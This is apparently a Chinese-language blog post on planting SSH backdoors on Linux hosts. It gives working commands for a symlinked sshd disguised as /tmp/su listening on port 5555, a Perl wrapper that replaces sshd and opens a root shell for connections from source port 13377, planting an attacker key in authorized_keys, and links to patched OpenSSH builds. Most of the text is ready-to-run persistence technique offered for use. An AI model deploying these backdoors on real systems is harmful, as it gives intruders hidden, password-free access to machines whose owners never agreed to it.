SSH 后门 | Nmap 脚本

0x01 软连接后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;

参考链接如下：

• https://www.cnblogs.com/sevck/p/6495884.html
• http://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/

0x02 SSH Wapper 后门

cd /usr/sbin/
mv sshd ../bin
vim sshd //编辑sshd内容为以下

#!/usr/bin/perl
exec"/bin/sh" if(getpeername(STDIN)=~/^..4A/); // \x00\x004A是13377的大端形式exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

重启sshd
service sshd restart

指定源端口为 13377 就可以无密码连接ssh了

参考链接

• https://mp.weixin.qq.com/s/-F_Ol-J-QfynOCYfD1nG3Q

如果你想修改这个源端口，设置成自己喜欢的，可以使用以下代码来实现

import struct
buffer = struct.pack('>I',13377)
print(buffer)

关于上面这行代码含义可以参考如下链接：

• https://docs.python.org/3/library/struct.html

0x03 ssh key 后门

在我们的攻击机中使用 ssh-keygen -t rsa 生成公私钥

生成的文件在 ~/.ssh/

将公钥 id_rsa.pub 上传到目标主机，保存为 ~/.ssh/authorized_keys

之后我们就可以直接免密码登录了

这个是一种管理方式，所以文章非常多，无论你遇到权限问题，文件问题都能找到答案

0x04 修改openssh

主要是利用升级openssh修改源代码来进行留后门，网络上比较多的是 openssh-5.9p1

参考下面文章（我在centos6.0和ubuntu 16.04 下都没有成功）

https://www.freebuf.com/sectool/10474.html

还有 openssh-7.6p1 ，应该是来自奇安信的 A-TEAM

https://github.com/QAX-A-Team/openssh-7.6p1-patch

同样遗憾的是，我在 centos 6.0 和 Ubuntu 16.04上都失败了，其实在github的commits 上已经有人提出这个问题了，不过似乎他们没有人在维护这个项目了，我也没有联系上 A-TEAM 的人

以上情况都说明了一点，还得自己整，不过对我来说不是现在，所以很遗憾咱们大家还无法从我这获取现成的后门。

SSH后门到此结束！

PS： Ubuntu 安装ssh后门程序需要的一些库

libssl-dev

sudo apt install -y zlib1g zlib1g-dev

apt-get install libpam0g-dev

sudo apt install libkrb5-dev